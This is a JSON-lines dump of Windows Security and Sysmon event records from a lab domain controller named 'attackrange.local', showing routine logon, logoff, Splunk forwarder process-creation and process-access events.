{"EventTime":"2020-08-01 07:57:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220411,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x628BA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50118\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x628ba","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50118","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:57:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220412,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x628BA\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x628ba","LogonType":"3","EventReceivedTime":"2020-08-01 07:57:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nProcessGuid: {41C8662E-2074-5F25-0000-0010BD290600}\r\nProcessId: 2952\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","ProcessGuid":"{41C8662E-2074-5F25-0000-0010BD290600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2074-5F25-0000-0010BD290600}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2074-5F25-0000-0010BD290600}","TargetProcessId":"2952","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2074-5F25-0000-0010BD290600}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2074-5F25-0000-0010BD290600}","TargetProcessId":"2952","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
